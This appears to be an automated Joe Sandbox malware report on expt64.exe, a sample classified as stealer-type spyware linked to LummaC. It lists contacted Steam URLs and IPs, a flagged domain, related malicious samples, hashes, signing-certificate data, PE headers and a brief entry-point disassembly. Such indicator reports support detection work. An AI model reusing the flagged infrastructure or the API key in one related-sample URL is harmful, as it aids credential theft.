                                                                                                                                                                  https://store.steampowered.com/news/expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=expt64.exe, 00000000.00000003.2503963189.0000000003379000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://store.steampowered.com/subscriber_agreement/expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2490967946.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000653000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#expt64.exefalse
                                                                                                                                                                          high
                                                                                                                                                                          https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgexpt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2490967946.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000653000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://recaptcha.net/recaptcha/;expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=enexpt64.exe, 00000000.00000003.2490967946.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=aep8expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000653000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://login.steampexpt64.exe, 00000000.00000003.2581042978.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2517025375.00000000006DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://steamcommunity.com/discussions/expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0expt64.exefalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://help.stCexpt64.exe, 00000000.00000003.2581042978.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2517025375.00000000006DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://store.steampowered.com/stats/expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amexpt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://medal.tvexpt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://broadcast.st.dl.eccdnx.comexpt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngexpt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&aexpt64.exe, 00000000.00000003.2490967946.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://store.steampowered.com/steam_refunds/expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      http://x1.c.lencr.org/0expt64.exe, 00000000.00000003.2531266282.0000000003350000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        http://x1.i.lencr.org/0expt64.exe, 00000000.00000003.2531266282.0000000003350000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchexpt64.exe, 00000000.00000003.2503963189.0000000003379000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=eexpt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://steamcommunity.com/workshop/expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://login.steampowered.com/expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbbexpt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                                        • 75% < No. of IPs
                                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                        104.102.49.254
                                                                                                                                                                                                                        steamcommunity.comUnited States
                                                                                                                                                                                                                        16625AKAMAI-ASUSfalse
                                                                                                                                                                                                                        104.21.64.1
                                                                                                                                                                                                                        sputnik-1985.comUnited States
                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                                        Analysis ID:1587438
                                                                                                                                                                                                                        Start date and time:2025-01-10 11:35:09 +01:00
                                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                        Overall analysis duration:0h 5m 24s
                                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                        Number of analysed new started processes analysed:4
                                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                                        Sample name:expt64.exe
                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@1/0@11/2
                                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                                                                        • Number of executed functions: 8
                                                                                                                                                                                                                        • Number of non-executed functions: 128
                                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                                                                        • Stop behavior analysis, all processes terminated
                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.45
                                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                                                        05:36:19API Interceptor11x Sleep call for process: expt64.exe modified
                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                        104.102.49.254r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                                                                                                        • /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
                                                                                                                                                                                                                        http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • www.valvesoftware.com/legal.htm
                                                                                                                                                                                                                        104.21.64.11162-201.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                        • www.mzkd6gp5.top/utww/
                                                                                                                                                                                                                        QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                        • www.mzkd6gp5.top/3u0p/
                                                                                                                                                                                                                        Sales Acknowledgement - HES #982323.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • ordrr.statementquo.com/QCbxA/
                                                                                                                                                                                                                        SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                                                                                                                                        • adsfirm.com/administrator/index.php
                                                                                                                                                                                                                        PO2412010.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                        • www.bser101pp.buzz/v89f/
                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                        sputnik-1985.comanti-malware-setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        • 104.21.48.1
                                                                                                                                                                                                                        appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                        • 104.21.80.1
                                                                                                                                                                                                                        [UPD]Intel_Unit.2.1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        • 104.21.64.1
                                                                                                                                                                                                                        Installer.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                                                                                                                                                        • 104.21.96.1
                                                                                                                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        • 104.21.80.1
                                                                                                                                                                                                                        BnJxmraqlk.exeGet hashmaliciousLummaC, PrivateLoaderBrowse
                                                                                                                                                                                                                        • 104.21.48.1
                                                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Babadeda, LummaC Stealer, Poverty Stealer, PureLog StealerBrowse
                                                                                                                                                                                                                        • 104.21.96.1
                                                                                                                                                                                                                        NjFiIQNSid.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        • 104.21.112.1
                                                                                                                                                                                                                        steamcommunity.com1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                        SensorExpo.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                        anti-malware-setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                        appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                        cache_registerer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                        Invoice.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                        NvOxePa.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                        h3VYJaQqI9.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                        P2V7Mr3DUF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                        v3tb7mqP48.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                        AKAMAI-ASUS1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                        SensorExpo.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                        anti-malware-setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                        appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                        cache_registerer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                        armv5l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 23.209.153.127
                                                                                                                                                                                                                        http://postman.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 104.102.43.106
                                                                                                                                                                                                                        https://sanctionssearch.ofac.treas.govGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 23.49.251.37
                                                                                                                                                                                                                        Fantazy.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 104.81.98.224
                                                                                                                                                                                                                        Fantazy.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 184.28.181.149
                                                                                                                                                                                                                        CLOUDFLARENETUSanti-malware-setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        • 104.21.48.1
                                                                                                                                                                                                                        https://we.tl/t-fnebgmrnYQGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 104.26.0.90
                                                                                                                                                                                                                        appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                        • 104.21.80.1
                                                                                                                                                                                                                        Undelivered Messages.htmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 104.21.84.200
                                                                                                                                                                                                                        driver.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                        • 162.159.137.232
                                                                                                                                                                                                                        XClient.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                        • 104.20.4.235
                                                                                                                                                                                                                        http://www.efnhdh.blogspot.mk/Get hashmaliciousGRQ ScamBrowse
                                                                                                                                                                                                                        • 172.67.12.83
                                                                                                                                                                                                                        gem1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                                        • 104.26.12.205
                                                                                                                                                                                                                        http://pdfdrive.com.coGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 104.21.11.245
                                                                                                                                                                                                                        RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                        • 104.21.80.1
                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                        a0e9f5d64349fb13191bc781f81f42e11.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                        • 104.21.64.1
                                                                                                                                                                                                                        SensorExpo.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                        • 104.21.64.1
                                                                                                                                                                                                                        anti-malware-setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                        • 104.21.64.1
                                                                                                                                                                                                                        appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                        • 104.21.64.1
                                                                                                                                                                                                                        cache_registerer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                        • 104.21.64.1
                                                                                                                                                                                                                        CY SEC AUDIT PLAN 2025.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                        • 104.21.64.1
                                                                                                                                                                                                                        PO#3_RKG367.batGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                        • 104.21.64.1
                                                                                                                                                                                                                        Invoice.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                        • 104.21.64.1
                                                                                                                                                                                                                        24EPV9vjc5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                        • 104.21.64.1
                                                                                                                                                                                                                        kXzODlqJak.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                        • 104.21.64.1
                                                                                                                                                                                                                        No context
                                                                                                                                                                                                                        No created / dropped files found
                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Entropy (8bit):7.968885257941795
                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 98.45%
                                                                                                                                                                                                                        • Inno Setup installer (109748/4) 1.08%
                                                                                                                                                                                                                        • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                                                                                                                                                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                        File name:expt64.exe
                                                                                                                                                                                                                        File size:10'171'362 bytes
                                                                                                                                                                                                                        MD5:c4cb62a984955f3ad185c1b289d816d9
                                                                                                                                                                                                                        SHA1:afaa3f895bc307c7dc41f9641a5c757a82e0c5fb
                                                                                                                                                                                                                        SHA256:a42ce4178e7dc0be9b8f8b91ef4af38e05c66c587b7ae80840cc60f45051d773
                                                                                                                                                                                                                        SHA512:e71787abde38d3c502f79299eb55b881481679cd450cd06439a40c89273e1af8f5bd6bb892fbc916a6c92154c5c5553fb86db2b3143bbd24b15b013122e6643f
                                                                                                                                                                                                                        SSDEEP:196608:rhnqDr/8t91hdgoTEPP/Ts5IjIxdZDr/8t91hdgoTEPP/Ts5IjIxN:pqDr/8tlmUuPbMIEXZDr/8tlmUuPbMIo
                                                                                                                                                                                                                        TLSH:F2A6233FB2A8B13EC4AA1631CAB3A320687BB665F1178E5E47F4050DCF264641E3F655
                                                                                                                                                                                                                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                                                                                                                        Icon Hash:2703494b4f060606
                                                                                                                                                                                                                        Entrypoint:0x4b5eec
                                                                                                                                                                                                                        Entrypoint Section:.itext
                                                                                                                                                                                                                        Digitally signed:true
                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                                                                                                        DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                        Time Stamp:0x63ECF218 [Wed Feb 15 14:54:16 2023 UTC]
                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                        File Version Major:6
                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                        Import Hash:e569e6f445d32ba23766ad67d1e3787f
                                                                                                                                                                                                                        Signature Valid:false
                                                                                                                                                                                                                        Signature Issuer:CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
                                                                                                                                                                                                                        Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                        Error Number:-2146869232
                                                                                                                                                                                                                        Not Before, Not After
                                                                                                                                                                                                                        • 23/02/2024 01:00:00 23/02/2025 00:59:59
                                                                                                                                                                                                                        Subject Chain
                                                                                                                                                                                                                        • CN="DivX, LLC", O="DivX, LLC", S=California, C=US, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=California, OID.1.3.6.1.4.1.311.60.2.1.3=US, SERIALNUMBER=201810310435
                                                                                                                                                                                                                        Version:3
                                                                                                                                                                                                                        Thumbprint MD5:2DA7E2FF6C3973639DFBA8BB9E4E8615
                                                                                                                                                                                                                        Thumbprint SHA-1:41DE7F0598117740C1C4B902EFF1C261E256D50D
                                                                                                                                                                                                                        Thumbprint SHA-256:B3CB3F863CCBA1BA364136E4767F93E317EF11CB65B8E808FBC5846F85CCF38B
                                                                                                                                                                                                                        Serial:00A9C1AA622FEF40C072052147482DF95B
                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                                        add esp, FFFFFFA4h
                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                        push esi
                                                                                                                                                                                                                        push edi
                                                                                                                                                                                                                        xor eax, eax
                                                                                                                                                                                                                        mov dword ptr [ebp-3Ch], eax
                                                                                                                                                                                                                        mov dword ptr [ebp-40h], eax
                                                                                                                                                                                                                        mov dword ptr [ebp-5Ch], eax
                                                                                                                                                                                                                        mov dword ptr [ebp-30h], eax
                                                                                                                                                                                                                        mov dword ptr [ebp-38h], eax
                                                                                                                                                                                                                        mov dword ptr [ebp-34h], eax
                                                                                                                                                                                                                        mov dword ptr [ebp-2Ch], eax
                                                                                                                                                                                                                        mov dword ptr [ebp-28h], eax
                                                                                                                                                                                                                        mov dword ptr [ebp-14h], eax
                                                                                                                                                                                                                        mov eax, 004B14B8h
                                                                                                                                                                                                                        call 00007F64A460C0D5h
                                                                                                                                                                                                                        xor eax, eax
                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                        push 004B65E2h
                                                                                                                                                                                                                        push dword ptr fs:[eax]
                                                                                                                                                                                                                        mov dword ptr fs:[eax], esp
                                                                                                                                                                                                                        xor edx, edx
                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                        push 004B659Eh
                                                                                                                                                                                                                        push dword ptr fs:[edx]
                                                                                                                                                                                                                        mov dword ptr fs:[edx], esp
                                                                                                                                                                                                                        mov eax, dword ptr [004BE634h]
                                                                                                                                                                                                                        call 00007F64A46AEBC7h
                                                                                                                                                                                                                        call 00007F64A46AE71Ah
                                                                                                                                                                                                                        lea edx, dword ptr [ebp-14h]
                                                                                                                                                                                                                        xor eax, eax
                                                                                                                                                                                                                        call 00007F64A4621B74h
                                                                                                                                                                                                                        mov edx, dword ptr [ebp-14h]
                                                                                                                                                                                                                        mov eax, 004C1D84h
                                                                                                                                                                                                                        call 00007F64A4606CC7h
                                                                                                                                                                                                                        push 00000002h
                                                                                                                                                                                                                        push 00000000h
                                                                                                                                                                                                                        push 00000001h
                                                                                                                                                                                                                        mov ecx, dword ptr [004C1D84h]
                                                                                                                                                                                                                        mov dl, 01h
                                                                                                                                                                                                                        mov eax, dword ptr [004238ECh]
                                                                                                                                                                                                                        call 00007F64A4622CF7h
                                                                                                                                                                                                                        mov dword ptr [004C1D88h], eax
                                                                                                                                                                                                                        xor edx, edx
                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                        push 004B654Ah
                                                                                                                                                                                                                        push dword ptr fs:[edx]
                                                                                                                                                                                                                        mov dword ptr fs:[edx], esp
                                                                                                                                                                                                                        call 00007F64A46AEC4Fh
                                                                                                                                                                                                                        mov dword ptr [004C1D90h], eax
                                                                                                                                                                                                                        mov eax, dword ptr [004C1D90h]
                                                                                                                                                                                                                        cmp dword ptr [eax+0Ch], 01h
                                                                                                                                                                                                                        jne 00007F64A46B4E6Ah
                                                                                                                                                                                                                        mov eax, dword ptr [004C1D90h]
                                                                                                                                                                                                                        mov edx, 00000028h
                                                                                                                                                                                                                        call 00007F64A46235ECh
                                                                                                                                                                                                                        mov edx, dword ptr [004C1D90h]
                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0xc40000x9a.edata
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xc20000xfdc.idata
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x5da00.rsrc
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x9b0a620x2980
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0xc60000x18.rdata
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0xc22f40x254.idata
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xc30000x1a4.didata
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                        .text0x10000xb39e40xb3a00571a33ab29f75930f860c76fe6d0a5cfFalse0.3463038774356298data6.362666353971951IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                        .itext0xb50000x16880x1800185e04b9a1f554e31f7f848515dc890cFalse0.54443359375data5.971425428435973IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
